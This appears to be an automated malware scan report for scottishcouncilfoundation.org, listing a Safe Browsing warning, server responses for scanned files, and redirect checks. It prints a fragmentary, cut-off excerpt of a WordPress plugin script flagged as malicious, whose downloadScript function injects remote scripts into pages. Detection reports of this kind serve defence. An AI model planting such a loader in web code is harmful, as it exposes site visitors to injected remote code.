Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=scottishcouncilfoundation.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.scottishcouncilfoundation.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 20:43:33 GMT Location: http://scottishcouncilfoundation.org/ Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://scottishcouncilfoundation.org/xmlrpc.php X-Powered-By: PHP/5.3.17 | clean |
http://scottishcouncilfoundation.org/ | 200 OK Content-Length: 43556 Content-Type: text/html | clean |
http://scottishcouncilfoundation.org/wp-content/plugins/fudou/js/jquery.flatheights.js | 200 OK Content-Length: 3694 Content-Type: application/javascript | clean |
http://scottishcouncilfoundation.org/wp-content/plugins/fudou/js/util.js | 200 OK Content-Length: 2179 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function createXmlHttpRequest() { try { if (typeof ActiveXObject != 'undefined') { return new ActiveXObject('Microsoft.XMLHTTP'); } else if (window["XMLHttpRequest"]) { return new XMLHttpRequest(); } } catch (e) { changeStatus(e); } return null; }; function downloadUrl(url, callback) { var status = -1; var request = createXmlHttpRequest(); if (!request) { return false; } request.onreadystate var doc = new ActiveXObject('Microsoft.XMLDOM'); doc.loadXML(str); return doc; } if (typeof DOMParser != 'undefined') { return (new DOMParser()).parseFromString(str, 'text/xml'); } return createElement('div', null); } function downloadScript(url) { var script = document.createElement('script'); script.src = url; document.body.appendChild(script); } Antivirus reports:
| ||
http://scottishcouncilfoundation.org/wp-content/plugins/fudou/js/jsearch.js | 200 OK Content-Length: 11718 Content-Type: application/javascript | clean |
http://scottishcouncilfoundation.org/wp-content/themes/crrb/js/navigation.js?ver=1.0 | 200 OK Content-Length: 895 Content-Type: application/javascript | clean |
http://www.scottishcouncilfoundation.org/tel:03-4455-9266 | 404 Not Found Content-Length: 333 Content-Type: text/html | clean |
http://www.scottishcouncilfoundation.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: scottishcouncilfoundation.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 20:43:34 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: http://scottishcouncilfoundation.org/xmlrpc.php
X-Powered-By: PHP/5.3.17
GET / HTTP/1.1
Host: scottishcouncilfoundation.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 20:43:34 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: http://scottishcouncilfoundation.org/xmlrpc.php
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: scottishcouncilfoundation.org
Referer: http://www.google.com/search?q=scottishcouncilfoundation.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: scottishcouncilfoundation.org
Referer: http://www.google.com/search?q=scottishcouncilfoundation.org
Result:
The result is similar to the first query. There are no suspicious redirects found.